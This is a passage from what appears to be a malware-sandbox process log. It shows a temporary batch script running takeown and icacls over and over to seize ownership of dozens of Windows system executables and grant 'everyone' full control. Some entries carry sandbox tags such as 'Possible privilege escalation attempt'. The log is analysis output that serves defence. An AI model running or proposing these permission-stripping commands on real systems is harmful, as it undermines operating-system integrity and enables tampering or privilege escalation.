C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-n..kgroundtransferhost_31bf3856ad364e35_10.0.22000.1_none_ef1ce2dee8e9f117\BackgroundTransferHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-n..setup-compatibility_31bf3856ad364e35_10.0.22000.1_none_d0ba8259b7939cb1\NetCfgNotifyObjectHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-n..setup-compatibility_31bf3856ad364e35_10.0.22000.1_none_d0ba8259b7939cb1\NetCfgNotifyObjectHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-n..setup-compatibility_31bf3856ad364e35_10.0.22000.1_none_d0ba8259b7939cb1\NetCfgNotifyObjectHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-net-command-line-tool_31bf3856ad364e35_10.0.22000.1_none_b2ca9978aba0e546\net.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-net-command-line-tool_31bf3856ad364e35_10.0.22000.1_none_b2ca9978aba0e546\net.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-net-command-line-tool_31bf3856ad364e35_10.0.22000.1_none_b2ca9978aba0e546\net.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.1_none_e7743b698dbcffb9\net1.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.1_none_e7743b698dbcffb9\net1.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.1_none_e7743b698dbcffb9\net1.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\f\net1.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\f\net1.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\f\net1.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\net1.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\net1.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\net1.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\r\net1.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\r\net1.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_8c8f05900e25e4d3\r\net1.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-netbt_31bf3856ad364e35_10.0.22000.1_none_c0fd105a306dfcd0\netbtugc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-netbt_31bf3856ad364e35_10.0.22000.1_none_c0fd105a306dfcd0\netbtugc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-netbt_31bf3856ad364e35_10.0.22000.1_none_c0fd105a306dfcd0\netbtugc.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-netplwiz-exe_31bf3856ad364e35_10.0.22000.1_none_4deefcbe498bbe87\Netplwiz.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-netplwiz-exe_31bf3856ad364e35_10.0.22000.1_none_4deefcbe498bbe87\Netplwiz.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-netplwiz-exe_31bf3856ad364e35_10.0.22000.1_none_4deefcbe498bbe87\Netplwiz.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-netsh_31bf3856ad364e35_10.0.22000.1_none_c0393e363102a7bd\netsh.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-netsh_31bf3856ad364e35_10.0.22000.1_none_c0393e363102a7bd\netsh.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-netsh_31bf3856ad364e35_10.0.22000.1_none_c0393e363102a7bd\netsh.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.22000.1_none_720e934c89d2ed1e\ndadmin.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.22000.1_none_720e934c89d2ed1e\ndadmin.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.22000.1_none_720e934c89d2ed1e\ndadmin.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.22000.1_none_720e934c89d2ed1e\newdev.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.22000.1_none_720e934c89d2ed1e\newdev.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.22000.1_none_720e934c89d2ed1e\newdev.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-notepad_31bf3856ad364e35_10.0.22000.1_none_cfb2d573a92990de\notepad.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-notepad_31bf3856ad364e35_10.0.22000.1_none_cfb2d573a92990de\notepad.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-notepad_31bf3856ad364e35_10.0.22000.1_none_cfb2d573a92990de\notepad.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-nslookup_31bf3856ad364e35_10.0.22000.1_none_2c18bbe89f9c63f0\nslookup.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-nslookup_31bf3856ad364e35_10.0.22000.1_none_2c18bbe89f9c63f0\nslookup.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-nslookup_31bf3856ad364e35_10.0.22000.1_none_2c18bbe89f9c63f0\nslookup.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-o..onalfeatures-fondue_31bf3856ad364e35_10.0.22000.1_none_aa4d552cc54f3bba\Fondue.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-o..onalfeatures-fondue_31bf3856ad364e35_10.0.22000.1_none_aa4d552cc54f3bba\Fondue.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-o..onalfeatures-fondue_31bf3856ad364e35_10.0.22000.1_none_aa4d552cc54f3bba\Fondue.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-onedrive-setup_31bf3856ad364e35_10.0.22000.1_none_85d889245f3a20db\OneDriveSetup.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-onedrive-setup_31bf3856ad364e35_10.0.22000.1_none_85d889245f3a20db\OneDriveSetup.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-onedrive-setup_31bf3856ad364e35_10.0.22000.1_none_85d889245f3a20db\OneDriveSetup.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-openfiles_31bf3856ad364e35_10.0.22000.1_none_47beaef9238dff6e\openfiles.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-openfiles_31bf3856ad364e35_10.0.22000.1_none_47beaef9238dff6e\openfiles.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-openfiles_31bf3856ad364e35_10.0.22000.1_none_47beaef9238dff6e\openfiles.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-openwith_31bf3856ad364e35_10.0.22000.1_none_cdb916a4abddbb05\OpenWith.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-openwith_31bf3856ad364e35_10.0.22000.1_none_cdb916a4abddbb05\OpenWith.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-openwith_31bf3856ad364e35_10.0.22000.1_none_cdb916a4abddbb05\OpenWith.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-optionaltsps_31bf3856ad364e35_10.0.22000.1_none_4294863d020c9d21\tcmsetup.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-optionaltsps_31bf3856ad364e35_10.0.22000.1_none_4294863d020c9d21\tcmsetup.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-optionaltsps_31bf3856ad364e35_10.0.22000.1_none_4294863d020c9d21\tcmsetup.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\printui.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\r\printui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\r\printui.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\r\printui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\diskperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\diskperf.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\diskperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\logman.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\logman.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\logman.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\relog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\relog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\relog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\tracerpt.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\tracerpt.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\tracerpt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\typeperf.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\typeperf.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_c1bbc2c937fef3c3\typeperf.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..nfiguration-cmdline_31bf3856ad364e35_10.0.22000.1_none_69f4002fb9e8f9d3\powercfg.exe"2⤵
- Power Settings
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..nfiguration-cmdline_31bf3856ad364e35_10.0.22000.1_none_69f4002fb9e8f9d3\powercfg.exe"3⤵
- Power Settings
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..nfiguration-cmdline_31bf3856ad364e35_10.0.22000.1_none_69f4002fb9e8f9d3\powercfg.exe" /grant "everyone":(f)3⤵
- Power Settings
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\f\ntprint.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\f\ntprint.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\f\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\ntprint.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\ntprint.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\r\ntprint.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\r\ntprint.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_f57e785f37294fe2\r\ntprint.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..structure-minkernel_31bf3856ad364e35_10.0.22000.1_none_398d4981eff37ba2\perfhost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..structure-minkernel_31bf3856ad364e35_10.0.22000.1_none_398d4981eff37ba2\perfhost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..structure-minkernel_31bf3856ad364e35_10.0.22000.1_none_398d4981eff37ba2\perfhost.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\lodctr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\lodctr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\lodctr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\unlodctr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\unlodctr.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\unlodctr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.22000.1_none_fca20623da1dc57b\perfmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.22000.1_none_fca20623da1dc57b\perfmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.22000.1_none_fca20623da1dc57b\perfmon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.22000.1_none_fca20623da1dc57b\resmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.22000.1_none_fca20623da1dc57b\resmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.22000.1_none_fca20623da1dc57b\resmon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_0e45b35a878542f9\PickerHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_0e45b35a878542f9\PickerHost.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_0e45b35a878542f9\PickerHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\PATHPING.EXE"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\PATHPING.EXE"3⤵
-
-
